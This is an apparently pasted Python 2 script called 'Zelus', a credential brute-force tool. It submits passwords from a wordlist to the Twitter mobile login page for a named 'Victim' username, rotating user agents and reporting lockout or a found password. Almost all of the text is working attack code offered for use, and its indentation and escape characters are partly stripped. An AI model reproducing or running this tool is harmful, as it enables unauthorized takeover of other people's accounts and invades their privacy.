#!/usr/bin/python# Copyright (c) Cameron Poe 2016# Python 2 Compatibleimport

1. #!/usr/bin/python
2. # Copyright (c) Cameron Poe 2016
3. # Python 2 Compatible
4.  
5. import sys
6. import cookielib
7. import random
8. import os
9.  
10. try:
11. import mechanize
12. except ImportError:
13. print ("No mechanize! Try 'pip install mechanize'")
14. try:
15. sys.argv[1]
16. except NameError:
17. print ("You must specify a username!")
18. print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
19. except IndexError:
20. print ("You must specify a wordlist!")
21. print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
22. try:
23. sys.argv[2]
24. except NameError:
25. print ("You must specify a username!")
26. print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
27. except IndexError:
28. print ("You must specify a wordlist!")
29. print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
30. username = sys.argv[1]
31. passwordlist = sys.argv[2]
32. str(username)
33. str(passwordlist)
34. useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
35.  
36. login = 'https://mobile.twitter.com/session/new'
37. lockedOut = 'https://mobile.twitter.com/account/locked'
38.  
39. def attack(password):
40. try:
41. global lockedOut
42. sys.stdout.write("r trying %s..." % password)
43. sys.stdout.flush()
44. br.addheaders = [('User-agent', random.choice(useragents))]
45. site = br.open(login)
46. br.select_form(nr=0)
47. br.form['session[username_or_email]'] = username
48. br.form['session[password]'] = password
49. br.submit()
50. if br.geturl() == lockedOut:
51. print ("n Locked Out!n")
52. sys.exit(1)
53. elif br.title() == "Twitter":
54. print ("n Password Found!n")
55. print (" Password: %sn" % (password))
56. sys.exit(1)
57. elif br.title() == "Verify your identity":
58. print ("n Password Found!n")
59. print (" Password: %sn" % (password))
60. sys.exit(1)
61.  
62. except KeyboardInterrupt:
63. print ("n Exiting Zelus...")
64. sys.exit(1)
65. def main():
66. global br
67. global passwords
68. try:
69. br = mechanize.Browser()
70. cj = cookielib.LWPCookieJar()
71. br.set_handle_robots(False)
72. br.set_handle_equiv(True)
73. br.set_handle_referer(True)
74. br.set_handle_redirect(True)
75. br.set_cookiejar(cj)
76. br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=99999)
77. except KeyboardInterrupt:
78. print ("n Exiting Zelus...")
79. sys.exit(1)
80. try:
81. list = open(passwordlist, "r")
82. passwords = list.readlines()
83. i = 0
84. while i < len(passwords):
85. passwords[i] = passwords[i].strip()
86. i += 1
87. except IOError:
88. print ("Error: check your password list path")
89. sys.exit(1)
90. except KeyboardInterrupt:
91. print ("n Exiting Zelus...")
92. sys.exit(1)
93. try:
94. print ("""
95. .%%%%%%..%%%%%%..%%......%%..%%...%%%%..
96. ....%%...%%......%%......%%..%%..%%.....
97. ...%%....%%%%....%%......%%..%%...%%%%..
98. ..%%.....%%......%%......%%..%%......%%.
99. .%%%%%%..%%%%%%..%%%%%%...%%%%....%%%%..
100. ........................................
101. Welcome to Zelus... Ready to start the war?
102. """)
103. print (" Victim: %s" % (username))
104. print (" Loaded:" , len(passwords), "passwords")
105. print (" Cracking, please wait...")
106. except KeyboardInterrupt:
107. print ("n Exiting Zelus...")
108. sys.exit(1)
109. try:
110. global password
111. for password in passwords:
112. attack(password)
113. attack(password)
114. except KeyboardInterrupt:
115. print ("n Exiting Zelus...")
116. sys.exit(1)
117.  
118. if __name__ == "__main__":
119. if sys.platform == 'win32' or sys.platform == 'win64':
120. os.system('cls')
121. main()
122. else:
123. os.system('clear')
124. main()